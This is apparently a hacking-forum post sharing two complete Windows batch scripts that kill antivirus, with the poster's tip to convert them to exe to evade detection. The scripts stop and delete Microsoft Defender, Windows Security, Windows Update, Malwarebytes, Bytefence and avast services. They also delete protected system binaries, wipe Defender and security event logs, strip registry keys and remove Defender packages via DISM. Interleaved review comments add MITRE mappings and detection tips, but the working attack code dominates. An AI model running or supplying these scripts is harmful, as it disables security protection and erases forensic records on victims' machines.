kill av | .bat | src

akenov

используй какай-нибудь конвертер из bat в exe, чтоб уменьшит детекты.


Код:
:: REVIEW NOTE, defensive annotation only: every command below is unchanged.
:: Purpose as visible in the commands: stop, disable and remove Microsoft
:: Defender, Windows Security, Windows Update and several third-party
:: anti-malware products, then delete related files, event logs and registry
:: keys. This maps to MITRE techniques T1562.001 for disabling security
:: tools, T1489 for service stop, T1070.001 for event-log removal and T1112
:: for registry modification.
:: Preconditions and mitigations: service control, writes under HKLM and
:: deletes under system32 need administrative rights, so keeping daily
:: accounts out of the local Administrators group limits the impact.
:: Defender Tamper Protection and the protected status of the Defender
:: services are designed to refuse changes of this kind; keep Tamper
:: Protection enabled and alert on the attempts themselves.
:: The script has no error checking, so an affected host can be left
:: partially modified; triage each artifact group below on its own.
@echo off
:: Service tampering. Targets: windefend, WdNisSvc and Sense for Defender and
:: Defender for Endpoint; wuauserv, usosvc and WaasMedicSvc for Windows
:: Update; SecurityHealthService and wscsvc for Windows Security and Security
:: Center; plus SDRSVC, WdiServiceHost, WdiSystemHost, InstallService,
:: VaultSvc, Spooler, LicenseManager and DiagTrack.
:: Detection: process-creation logging, Security event 4688 or Sysmon event 1,
:: for sc.exe with stop, config start= disabled or delete against these
:: names; Service Control Manager events 7036 and 7040 in the System log;
:: Defender Operational events 5001 and 5007.
sc stop windefend
sc config windefend start= disabled
sc delete windefend
sc stop WdNisSvc
sc config WdNisSvc start= disabled
sc delete WdNisSvc
sc stop Sense
sc config Sense start= disabled
sc delete Sense
sc stop wuauserv
sc config wuauserv start= disabled
sc stop usosvc
sc config usosvc start= disabled
sc stop WaasMedicSvc
sc config WaasMedicSvc start= disabled
sc stop SecurityHealthService
sc config SecurityHealthService start= disabled
sc delete SecurityHealthService
sc stop SDRSVC
sc config SDRSVC start= disabled
sc stop wscsvc
sc config wscsvc start= disabled
sc stop WdiServiceHost
sc config WdiServiceHost start= disabled
sc stop WdiSystemHost
sc config WdiSystemHost start= disabled
sc stop InstallService
sc config InstallService Start= disabled
sc stop VaultSvc
sc config VaultSvc start= disabled
sc stop Spooler
sc config Spooler start= disabled
sc stop LicenseManager
sc config LicenseManager start= disabled
sc stop DiagTrack
sc config DiagTrack start= disabled
:: Forced termination of SmartScreen and Windows Security processes.
:: Detection: taskkill.exe with /f /im naming a security process.
taskkill /f /im smartscreen.exe
taskkill /f /im SecurityHealthService.exe
taskkill /f /im MpCopyAccelerator.exe
:: Recursive, silent removal of the Defender and Windows Security directories
:: under Program Files, Program Files x86 and ProgramData\Microsoft.
:: Detection: file-delete telemetry or file integrity monitoring on these
:: directories.
cd C:\
cd C:\Program Files\
RD /S /Q "Windows Defender"
RD /S /Q "Windows Defender Advanced Threat Protection"
RD /S /Q "Windows Security"
cd C:\Program Files (x86)\
RD /S /Q "Windows Defender"
cd C:\ProgramData\Microsoft
taskkill /f /im MpCopyAccelerator.exe
RD /S /Q "Windows Defender"
RD /S /Q "Windows Defender Advanced Threat Protection"
RD /S /Q "Windows Security Health"
:: Deletion of Windows Security, Security Center and SmartScreen binaries from
:: system32. Recovery note: missing protected system files are a strong
:: integrity signal; compare against a known-good image and repair with the
:: system file checker or by reimaging.
cd C:\
cd Windows
cd system32
taskkill /f /im SecurityHealthService.exe
del /f WindowsUpdateElevatedInstaller.exe
del /f SecurityHealthSystray.exe
del /f SecurityHealthService.exe
del /f SecurityHealthHost.exe
del /f SecurityCenterBroker.dll
del /f SecurityCenterBrokerPS.dll
del /f SecurityHealthAgent.dll
del /f SecurityHealthProxyStub.dll
del /f SecurityHealthSSO.dll
del /f SmartScreenSettings.exe
del /f smartscreenps.dll
del /f smartscreen.exe
del /f Windows.Security.Integrity.dll
del /f windowsdefenderapplicationguardcsp.dll
del /f wscsvc.dll
del /f wscsvc.dll.mui
del /f wsecedit.dll
:: Event-log removal aimed at Defender and security-related channels under
:: system32\Winevt\Logs. Mitigation: forward these channels to a central
:: collector so that local deletion does not remove the record, and alert on
:: a host whose forwarded security telemetry suddenly stops.
cd Winevt\Logs
del /f Microsoft-Windows-Windows Defender%4Operational.evtx
del /f Microsoft-Windows-Windows Defender%4WHC.evtx
del /f Microsoft-Windows-Security-Audit-Configuration-Client%4Operational.evtx
del /f Microsoft-Windows-Security-EnterpriseData-FileRevocationManager%4Operational.evtx
del /f Microsoft-Windows-Security-Netlogon%4Operational.evtx
:: Closes the Settings app, removes the 32-bit SmartScreen proxy DLL and
:: deletes the AppRepository entries of the Windows Security UI package. The
:: package name is hard-coded to build 10.0.19041.423.
cd C:\Windows\ImmersiveControlPanel
taskkill /f /im SystemSettings.exe
cd C:\Windows\SysWOW64
del /f smartscreenps.dll
cd C:\ProgramData\Microsoft\Windows\AppRepository
del /f Microsoft.Windows.SecHealthUI_10.0.19041.423_neutral__cw5n1h2txyewy.xml
cd C:\ProgramData\Microsoft\Windows\AppRepository\Packages
RD /S /Q "Microsoft.Windows.SecHealthUI_10.0.19041.423_neutral__cw5n1h2txyewy"
:: Registry deletion: Defender and Security Center configuration and policy
:: keys, the service keys WdBoot, WdFilter, WdNisDrv, WdNisSvc and wscsvc, and
:: the SecurityHealth autostart value under Run.
:: Detection: reg.exe delete command lines naming these paths; registry
:: auditing, Security events 4657 and 4663, or Sysmon event 12 on the keys.
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /f
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Security Health" /f
reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows Defender" /f
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Defender" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SecurityHealth /f
:: Second pass of the service deletion already attempted at the top.
sc delete windefend
sc delete sense
:: Third-party products: MBAMService, MBAMWsc.exe and MBAM.exe belong to
:: Malwarebytes; Bytefence and avast are named directly; nsWscSvc is
:: presumably a vendor Security Center registration service, confirm against
:: the installed product. Mitigation: keep vendor self-protection enabled and
:: alert centrally when an endpoint agent stops reporting.
sc stop nsWscSvc
taskkill /f /im MBAMWsc.exe
sc stop MBAMService
sc config MBAMService start= disabled
sc delete MBAMService
taskkill /f /im MBAM.exe
sc stop Bytefenceservice
sc config Bytefenceservice start= disabled
sc delete Bytefenceservice
taskkill /f /im Bytefence.exe
cd C:\Program Files\
RD /S /Q "Malwarebytes"
RD /S /Q "Bytefence"
cd C:\Program Files (x86)\
RD /S /Q "Malwarebytes"
RD /S /Q "Bytefence"
cd C:\Program Files\Malwarebytes
RD /S /Q "Anti-Malware"
sc stop "avast! Tools"
sc config "avast! Tools" start= disabled
sc delete "avast! Tools"
sc stop "avast! Antivirus"
sc config "avast! Antivirus" start= disabled
:: Broadcasts a short text message to every session on the host; a visible
:: artifact only, with no effect on the changes above.
msg * hui



Код:
:: Made by Hoang Hung

:: Removes the Windows Defender components from a running Windows install.
:: REVIEW NOTE, defensive annotation only: every command below is unchanged.
:: The script requests elevation, unregisters the Windows Security UI app and
:: the Defender shell extension, deletes the Owners subkey of the Defender
:: servicing packages, removes a subset of those packages with DISM and sets
:: two policy values. This is defense impairment, MITRE technique T1562.001,
:: combined with registry modification, T1112.
:: Mitigations: standard-user accounts, so that the elevation request needs
:: administrator credentials; Defender Tamper Protection; application control
:: that blocks unapproved batch and VBScript files.
@echo off

:: Admin check: cacls against the SYSTEM hive fails without elevation. In that
:: case a helper named getadmin.vbs is written to the user temp directory and
:: relaunches this file through ShellExecute with the runas verb, then this
:: instance exits. That raises a normal UAC consent prompt; it does not
:: bypass UAC.
:: Detection: creation of getadmin.vbs in a temp directory, and a script host,
:: normally wscript.exe, starting an elevated cmd.exe for a batch file.
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
if "%errorlevel%" NEQ "0" (
 echo: Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
 echo: UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"
 "%temp%\getadmin.vbs" & exit
)
if exist "%temp%\getadmin.vbs" del /f /q "%temp%\getadmin.vbs"

Title Remove Windows Defender

:: Reads the Version value of the CLSID key below into vers; the value is
:: reused further down to build package and registry key names.
for /f "tokens=2*" %%e in ('reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"') do set vers=%%f

:: Selects the architecture token used in the package names.
if %PROCESSOR_ARCHITECTURE% EQU AMD64 (set arc=amd64) else (set arc=x86)

:: Deletes the inbox-application registration of the Windows Security UI
:: package, SecHealthUI, for the version read above.
echo.
echo Deleting key in "Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications"
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_%vers%_neutral_neutral_cw5n1h2txyewy" /f >nul 2>&1

:: Deletes the EPP context-menu handlers for files, directories and drives;
:: EPP is presumably the Defender scan entry in the Explorer context menu,
:: confirm on a reference host.
reg delete "HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\EPP" /f >nul 2>&1
reg delete "HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\EPP" /f >nul 2>&1
reg delete "HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers\EPP" /f >nul 2>&1

:: List of Defender servicing package names built from arc and vers.
set pack=(Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Client-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-CloudClean-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Core-Group-amcore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Core-Group-onecore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Core-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Group-Policy-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Management-Group-amcore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Management-Group-onecore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Management-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Management-MDM-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Nis-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Shield-Provider-Core-Package~31bf3856ad364e35~%arc%~~%vers%)

:: For every package in the list, deletes its Owners subkey under Component
:: Based Servicing\Packages; output of reg is discarded, so failures are
:: silent.
:: Detection: registry auditing or Sysmon event 12 on Component Based
:: Servicing\Packages for Windows-Defender package names.
for /d %%b in %pack% do (
echo ========================================================================
echo Deleting key in "Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\%%b\Owners"
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\%%b\Owners" /f >nul 2>&1
)

:: Shorter list of packages that are passed to DISM for removal.
set packremove=(Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Client-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Group-Policy-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Shield-Provider-Core-Package~31bf3856ad364e35~%arc%~~%vers%)

:: Removes each listed package from the running image without a restart.
:: Detection: dism.exe with /online /remove-package naming a Windows-Defender
:: or Windows-Shield package; the DISM and CBS logs under the Windows Logs
:: directory keep a record of the removal for later forensics.
for /d %%c in %packremove% do (
echo ========================================================================
echo Removing package %%c...
dism /online /remove-package /packagename:%%c /NoRestart
)
:: Policy values set last: DontOfferThroughWUAU=1 stops the Malicious Software
:: Removal Tool from being offered through Windows Update, and
:: SettingsPageVisibility hides the windowsdefender page in Settings, which
:: makes the missing protection less visible to the user. Both values are
:: cheap to audit fleet-wide as indicators of this script having run.
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f >nul 2>&1
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender" /f >nul 2>&1
echo ========================================================================
pause
 

